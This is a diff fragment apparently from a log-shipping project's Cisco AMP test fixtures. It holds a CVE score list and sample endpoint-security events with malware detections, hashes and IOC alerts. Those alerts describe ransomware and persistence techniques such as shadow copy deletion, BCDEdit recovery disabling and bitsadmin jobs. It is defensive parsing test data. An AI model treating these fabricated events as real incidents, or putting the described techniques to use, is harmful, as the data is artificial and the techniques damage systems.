},{"cve":"CVE-2015-5087","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5087"},{"cve":"CVE-2015-5090","score":"7.2","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5090"},{"cve":"CVE-2015-5091","score":"7.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5091"},{"cve":"CVE-2015-5093","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5093"},{"cve":"CVE-2015-5094","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5094"},{"cve":"CVE-2015-5095","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5095"},{"cve":"CVE-2015-5096","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5096"},{"cve":"CVE-2015-5097","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5097"},{"cve":"CVE-2015-5098","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5098"},{"cve":"CVE-2015-5099","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5099"},{"cve":"CVE-2015-5100","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5100"},{"cve":"CVE-2015-5101","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5101"},{"cve":"CVE-2015-5102","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5102"},{"cve":"CVE-2015-5103","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5103"},{"cve":"CVE-2015-5104","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5104"},{"cve":"CVE-2015-5105","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5105"},{"cve":"CVE-2015-5106","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5106"},{"cve":"CVE-2015-5108","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5108"},{"cve":"CVE-2015-5109","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5109"},{"cve":"CVE-2015-5110","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5110"},{"cve":"CVE-2015-5111","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5111"},{"cve":"CVE-2015-5113","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5113"},{"cve":"CVE-2015-5114","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5114"},{"cve":"CVE-2015-5115","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5115"},{"cve":"CVE-2017-11211","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11211"},{"cve":"CVE-2017-11212","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11212"},{"cve":"CVE-2017-11214","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11214"},{"cve":"CVE-2017-11216","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11216"},{"cve":"CVE-2017-11218","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11218"},{"cve":"CVE-2017-11219","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11219"},{"cve":"CVE-2017-11220","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11220"},{"cve":"CVE-2017-11221","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11221"},{"cve":"CVE-2017-11222","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11222"},{"cve":"CVE-2017-11223","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11223"},{"cve":"CVE-2017-11224","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11224"},{"cve":"CVE-2017-11226","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11226"},{"cve":"CVE-2017-11227","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11227"},{"cve":"CVE-2017-11228","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11228"},{"cve":"CVE-2017-11229","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11229"},{"cve":"CVE-2017-11234","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11234"},{"cve":"CVE-2017-11235","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11235"},{"cve":"CVE-2017-11237","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11237"},{"cve":"CVE-2017-11241","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11241"},{"cve":"CVE-2017-11251","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11251"},{"cve":"CVE-2017-11254","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11254"},{"cve":"CVE-2017-11256","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11256"},{"cve":"CVE-2017-11257","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11257"},{"cve":"CVE-2017-11259","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11259"},{"cve":"CVE-2017-11260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11260"},{"cve":"CVE-2017-11261","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11261"},{"cve":"CVE-2017-11262","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11262"},{"cve":"CVE-2017-11263","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11263"},{"cve":"CVE-2017-11267","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11267"},{"cve":"CVE-2017-11269","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11269"},{"cve":"CVE-2017-11270","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11270"},{"cve":"CVE-2017-11271","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11271"}]}} diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json deleted file mode 100644 index 52efeb8e97b..00000000000 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json +++ /dev/null @@ -1,87 +0,0 @@ -[ - { - "@timestamp": "2020-11-11T09:51:38.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "1235-1234sdgf-654sdf-7562345", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "192.168.196.22", - "mac": "aa:d9:ac:af:1d:ad" - }, - { - "ip": "192.168.120.1", - "mac": "12:24:56:c2:00:01" - }, - { - "ip": "192.168.160.1", - "mac": "12:50:56:c2:53:08" - } - ], - "cisco.amp.connector_guid": "1235-1234sdgf-654sdf-7562345", - "cisco.amp.detection": "W32.Trojan.22gp.1201", - "cisco.amp.detection_id": "12365423467", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Unknown", - "cisco.amp.group_guids": [ - "6542345gdfs-234-sdf2-34-6345243" - ], - "cisco.amp.related.mac": [ - "aa:d9:ac:af:1d:ad", - "12:24:56:c2:00:01", - "12:50:56:c2:53:08" - ], - "cisco.amp.timestamp_nanoseconds": 153000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 123578990, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "9a8557b98ed1469272fa0ace91d63477", - "file.hash.sha1": "d0c4192b65e36553fvfd2b83f3113f6ae8390baa", - "file.hash.sha256": "e678899d7ea9702184067b56655f91b69f8a0bdc9df65613762252c055c2cdvc", - "file.name": "HYXiN3hY.exe.part", - "file.path": "\\\\?\\C:\\Users\\elastic\\AppData\\Local\\Temp\\HYXiN3hY.exe.part", - "fileset.name": "amp", - "host.hostname": "testhost", - "host.name": "testhost", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@domain", - "input.type": "log", - "log.offset": 0, - "process.hash.md5": "e50ab86d5409d4d0ad386b27ea7f78fb", - "process.hash.sha1": "d539afb0991e823c7cdf824b610a5a5d7655a2da", - "process.hash.sha256": "a7ca534327103ec5fac749f5ab8b7a1fe81209aa580a52df656284ef6215f0ab", - "process.name": "firefox.exe", - "process.pid": 88, - "related.hash": [ - "e678899d7ea9702184067b56655f91b69f8a0bdc9df65613762252c055c2cdvc", - "9a8557b98ed1469272fa0ace91d63477", - "d0c4192b65e36553fvfd2b83f3113f6ae8390baa" - ], - "related.hosts": [ - "testhost" - ], - "related.ip": [ - "8.8.8.8", - "192.168.196.22", - "192.168.120.1", - "192.168.160.1" - ], - "related.user": [ - "user@domain" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - } -] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log new file mode 100644 index 00000000000..211de5d2bc9 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log @@ -0,0 +1,49 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837","sha1":"128aa78059540cf0cdae2a3cea30cd80e00f2046","md5":"c877b67a5733c59d0d8ed8d519df0c91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533243623469744000,"timestamp":1610619329,"timestamp_nanoseconds":596000000,"date":"2021-01-14T10:15:29+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT657.tmp","file_path":"\\\\?\\C:\\BIT657.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"SqGGuYXyy.exe","file_path":"\\\\?\\C:\\SqGGuYXyy.exe","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT4BBF.tmp","file_path":"\\\\?\\C:\\BIT4BBF.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739875754000,"timestamp":1610618750,"timestamp_nanoseconds":875739000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.","short_description":"W32.WScriptExecuteFakeExtension.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739868158500,"timestamp":1610618750,"timestamp_nanoseconds":868146000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.","short_description":"W32.Bitsadmin.ioc"},"file":{"disposition":"Clean","file_name":"bitsadmin.exe","file_path":"/C:/Windows/System32/bitsadmin.exe","identity":{"sha256":"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"},"parent":{"disposition":"Clean","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739846959000,"timestamp":1610618750,"timestamp_nanoseconds":846943000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.","short_description":"W32.WScriptLaunchedZippedJS.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576726048000300,"timestamp":1610618696,"timestamp_nanoseconds":48000000,"date":"2021-01-14T10:04:56+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618696,"start_date":"2021-01-14T10:04:56+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"/C:/windows/system32/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576727672000300,"timestamp":1610618689,"timestamp_nanoseconds":672000000,"date":"2021-01-14T10:04:49+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610618689,"start_date":"2021-01-14T10:04:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.","short_description":"W32.BCDEditDisableRecovery.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/windows/system32/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458617561791000300,"timestamp":1610618620,"timestamp_nanoseconds":791000000,"date":"2021-01-14T10:03:40+00:00","event_type":"Cloud 